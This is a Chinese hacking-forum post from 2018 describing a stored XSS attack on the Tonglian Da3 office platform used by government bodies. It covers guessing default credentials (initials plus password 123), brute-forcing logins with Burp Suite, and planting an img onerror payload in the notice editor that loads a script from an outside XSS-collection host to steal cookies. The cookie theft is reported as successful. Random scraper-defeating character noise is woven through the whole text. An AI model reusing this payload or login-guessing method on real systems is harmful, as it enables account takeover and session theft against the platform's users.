中国网络渗透测试联盟

标题: 同联Da3协同办公平台后台通用储存型xss漏洞 [打印本页]

作者: admin    时间: 2018-10-20 20:14
标题: 同联Da3协同办公平台后台通用储存型xss漏洞
! }) O; N: }% B 4 `5 S9 [& B } " B6 v* Y/ n5 ^" V( G4 l5 i( m- m ! }2 R; U i. a" z1 P& T9 v- ^# N( { V0 P2 e8 D& A" V( R" L' j8 m# Q 4 h6 \; s- `/ s, f2 i0 R% T+ P. i- r5 A3 X8 E: j L ) g* k# p7 x3 g- ?" M& c" H - ?2 ?: X( S4 r( m1 q / i# k, q- h. O, U ) a% D. w* t v( a! Y" X$ s+ k8 N, q$ c# m4 z
. m X) r) [* A" ~6 B, S

7 e& z3 E/ [* [' a/ P$ p6 s+ ~: T/ n 同联Da3协同办公平台后台通用储存型xss漏洞 ' V$ Q8 u9 X0 x. ?+ v: R8 T) d

3 K6 }; F. D" Q8 m

! s$ Y5 X5 I8 C6 r/ v9 g/ r 平台简介:* ]4 v% ?% Z V0 k; {

" q. r6 J' w! ^

: T/ G4 j9 O# P' r! ?  ( Q! n! C" l b. i) z

. P. z/ U& `! d( C9 m

0 h6 B) o" W C) Q1 H 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
" Z* v# N" [9 V: r$ f 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
8 m* m" L/ p. O. T( i 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!+ U C. [/ v+ p0 n% F# [) H4 i

; j: z( l2 f" E7 N' A* I

# j$ o! Q A2 D, g. M& j   a, a) M% C. D+ K# x! i* s

9 p* i% d2 D% O) M2 S2 e

2 L( J* N" B7 v2 Z0 | 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:. v- s' q7 y2 @; |- C% \

# W0 w! N6 _ l( I; `' X g6 f

/ V6 Q. b; n0 ]' V2 n# B  ' p6 V" P; ~* i+ s: m* J, ?

3 b# b h% ?# K6 H7 x

: y% N/ N; H6 X* L$ p$ Z http://1.1.1.1:7197/cap-aco/#(案例2-)) V+ ?# _3 X9 c4 ^) j8 d; e( V0 \* B/ Q

( Y9 ]' u/ A: f' v1 I

* Z) B: b6 U/ S http://www.XXOO.com (案例1-官网网站). Y' s3 [' b( V1 ?: J( q* O3 P; o: Z

7 e) H' K2 J6 I+ U9 H5 _2 ?

1 W% w% ]9 y0 h 漏洞详情:6 j( [ {/ F, H

H$ z" r2 d' {) J

! ?) F% u/ k% {5 M  案例一、 S3 M! `, T* d

: o8 n* w+ {/ M% l/ E/ B

, ?; b9 J* \0 a& Q0 k 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试" x6 j8 y9 d1 n9 Z* n$ j; m

) H9 A/ t/ W, U; c! Q* w- O

% |$ P" [ K& a      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:& @' i' k& K( k I# o+ w

8 z3 Q- l: t9 y' j: M

3 a) y' j9 P6 G: [; v' b" @( m  : V& g, Y( z4 c: e& W

* I# V T( b0 \ S5 b r, ^

7 U0 t& E" \% e0 ^0 e& v* k IMG_256 8 g# z6 o3 J3 O* |1 [! p+ Q

/ Y P. Y; U# B- [* D" B

2 N8 ^" C' j u+ x! z9 U status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: + W. `" h, h9 M: |, z4 w6 \

0 w. t+ I) t# b! d: }5 v- R

$ C1 Z) R$ f' @, K9 p   * j t) l. B& m3 L+ s- E

5 m p- h3 W8 A) I

0 g. J' N/ w$ b5 \/ N( h 0 K+ }- j$ y1 @% s' f4 W' G

- l/ y; Z# w S5 W$ u

$ e d+ v) _" Z% ~ {& M 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 . m3 M' G# N) ^% }

0 z1 k* ] C3 ?- Q

7 _0 q- r5 c3 _6 m; T' J; ]   . x' c( L7 u2 h/ |9 ^

* e6 m" X# Q: K4 v

- B+ O A( v2 V$ e+ f <img src=x: k; Z( ^5 Z8 q. v6 w& m# {9 z2 H onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: * b8 H$ T0 u7 o3 n# ]

( e0 B* U+ x$ O8 Z2 u/ Q/ c2 T( h4 t

% {' i3 T' w% ^ : \1 F. G6 d/ B2 E

9 i2 \% l7 h9 ~

: ?& |& h4 n, g4 ?- H1 {- \; N 然后发送,接收cookie如图: % c. {# K1 h& o

3 Z' k2 G0 b, e/ o

! \4 T; U) A4 a4 P, |2 K   * B# r6 j0 y9 Z q1 @

3 h! {9 g4 p3 K4 a2 W$ ^" E0 i

' u8 ~* D9 u7 l0 r& N; f   1 m% Q- d) t+ f& O

: ]# F# U" d. O8 U; @

, j1 o; n6 k. T& ?, m   ) o5 ~: c7 D- x. ?

- H/ j0 R! v% N2 P

$ K# d- p. _7 s7 b* o   8 l; B9 z" w; m7 N0 R2 @

2 K8 s2 s1 a5 N3 i/ i$ ?

! a/ I: j, @4 O, I1 \" Z; }$ k8 k " I. m8 G0 @; K- B7 W' w

! Z0 _) n8 O) v% p0 ~1 _

# Z0 D0 _6 e* j5 u" G) G 3 X; F1 Y# o1 _: {6 n3 |+ L

; j! q& @1 U( }! l7 q) d; J

; o' O! W6 I: U; L   ! ]4 B! G+ ]7 _

6 C; a" v2 ^6 L# k$ ?

8 [8 {+ z: S3 A$ Y6 g1 l% c 案例2、 + X. n+ ~- q1 `

! Y* ^9 d: {! R, J& ^* r# x5 b

" F6 b" {3 j5 A 前面步骤都一样,下面看效果图: : d% |6 p: @# f9 ?9 m% T& ~

7 ^/ L* J' W1 [

# _& @3 W* h6 }- M& f! z 1 l2 v% m/ p- [+ G

& [# V3 C( s' o6 N/ z

+ w; P: f; @+ R$ h- ]. m7 l3 r3 K , r+ E5 c: @' q& w% ^

. S* v6 A1 }, ~+ }

9 E$ G5 y, }$ f   , j* H3 V& ?" d" {! }1 e) x

9 N+ x' j9 A2 X. P( L# c" g& k# N6 z

+ l( a H" r) I1 \5 c   : a4 ?$ B; d c

- G% L; T! }, ^. b) _4 X0 x

* t& t1 a% g2 Q . W6 u0 q z1 q/ u- Y2 f+ A

) S, x+ b4 ~2 Z) `8 C3 n' r! n8 V

; O# U2 @! ]5 x$ D8 N+ z   . B+ y) j: s! t0 l+ y. r7 z

1 M' H7 e; [5 F& ^& m2 b

# |* v; i! ]& g- [- {/ P   9 ^6 E) L+ z/ ]+ I, y d

/ e) X- h: Y2 W* M# _

( e+ z5 Q4 [& M) ?& s   0 ]) A3 h/ [( p* m+ l5 a+ @3 ~

9 K3 t8 C) M& m5 F* r1 g

8 q& G3 N$ O8 \2 u$ m   5 a$ \( M1 F( `+ k1 n" ]

$ C; p# F$ i" b* s: b7 ?





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2